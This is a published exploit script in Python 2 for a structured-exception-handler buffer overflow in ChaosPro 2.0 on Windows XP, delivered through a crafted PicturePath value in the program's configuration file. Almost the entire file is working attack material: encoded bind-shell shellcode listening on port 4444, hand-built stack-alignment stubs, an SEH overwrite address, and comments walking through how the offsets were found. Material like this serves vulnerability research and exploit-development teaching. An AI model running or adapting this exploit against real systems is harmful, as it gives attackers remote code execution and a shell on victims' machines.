Share
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)  
# Date: 2019-10-27  
# Exploit Author: Chase Hatch (SYANiDE)  
# Vendor Homepage: http://www.chaospro.de/  
# Software link: http://www.chaospro.de/cpro20.zip  
# Version: 2.0  
# Tested on: Windows XP Pro OEM  
  
#!/usr/bin/env python2  
import os, sys  
  
  
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM  
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431  
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705  
# sploit = "A" * (2705 - 4 - 126) # 2575  
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE  
# `locate pattern_offset.rb|head -n 1` 61413561 2575  
# 16  
  
  
################ Second stage ####################  
sploit = "A"*16  
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh   
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c  
sploit += (  
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"  
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"  
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"  
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"  
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"  
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"  
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"  
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"  
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"  
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"  
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"  
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"  
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"  
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"  
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"  
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"  
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"  
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"  
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"  
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"  
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"  
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"  
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"  
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"  
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"  
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"  
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"  
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"  
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"  
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"  
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"  
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"  
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"  
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"  
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"  
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"  
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"  
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"  
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"  
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"  
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"  
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"  
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"  
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"  
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"  
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"  
"\x6f\x39\x45\x41\x41"  
) # 710 bytes  
sploit += "A" * (2575 - 16 - 710)  
  
  
################ First stage ####################  
  
# ESP: 0012E75C  
# ESP target: 0012FF98  
## Need to align to four-byte and 16-byte boundaries:  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc  
# 282.0000  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc  
# 1551.0000  
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc  
# 183C  
# 0012FF32 54 PUSH ESP  
# 0012FF33 58 POP EAX  
# 0012FF34 66:05 3C18 ADD AX,183C  
# 0012FF38 50 PUSH EAX  
# 0012FF39 5C POP ESP  
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8  
  
  
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF  
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803  
# 0:25 28 28 28 28 and eax,0x28282828  
# 5:25 47 47 47 47 and eax,0x47474747  
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f  
# f:2d 7f 01 01 01 sub eax,0x101017f  
# 14:2d 03 18 3e 3e sub eax,0x3e3e1803  
# 19:50 push eax  
sploit += (  
"\x25\x28\x28\x28\x28"  
"\x25\x47\x47\x47\x47"  
"\x2d\x7f\x01\x7f\x7f"  
"\x2d\x7f\x01\x01\x01"  
"\x2d\x03\x18\x3e\x3e"  
"\x50"  
) # 26 bytes  
  
## Realign new ESP with beginning of overflow buffer:  
## New ESP should be four-byte and 16-byte aligned:  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc  
# 122.0000  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc  
# 671.0000  
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc  
# A7C  
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)  
# 0012FF54 44 INC ESP  
# 0012FF55 44 INC ESP  
# 0012FF56 44 INC ESP  
# 0012FF57 44 INC ESP  
# 0012FF58 44 INC ESP  
# 0012FF59 44 INC ESP  
# 0012FF5A 44 INC ESP  
# 0012FF5B 44 INC ESP  
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8  
  
## Going to have to carve out the address 0012F51C  
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864  
# 0:25 02 02 02 02 and eax,0x2020202  
# 5:25 51 51 51 51 and eax,0x51515151  
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f  
# f:2d 01 01 01 61 sub eax,0x61010101  
# 14:2d 64 08 6d 1f sub eax,0x1f6d0864  
# 19:50 push eax  
sploit +=(  
"\x25\x02\x02\x02\x02"  
"\x25\x51\x51\x51\x51"  
"\x2d\x7f\x01\x7f\x7f"  
"\x2d\x01\x01\x01\x61"  
"\x2d\x64\x08\x6d\x1f"  
"\x50"  
) # 26 bytes  
  
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP  
# 5C POP ESP  
sploit += "\x5c" # 1  
  
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)  
  
################ RET from SEH: JMP SHORT - 126 ####################  
  
sploit += "\xeb\x80" + "\x41\x41" # 4  
# 00401B44 |. 5F POP EDI  
# 00401B45 |> 5E POP ESI  
# 00401B46 \. C3 RETN  
sploit += "\x44\x1b\x40\x00"  
  
  
################ build the config ####################  
## Running from just outside base directory of ChaosPro:  
  
def ret_cfg(inp):  
# do it live in PicturePath  
cfg = """PicturePath %s""" % inp  
with open("chaospro\\ChaosPro.cfg",'w') as F:  
F.write(cfg)  
F.close()  
  
ret_cfg(sploit)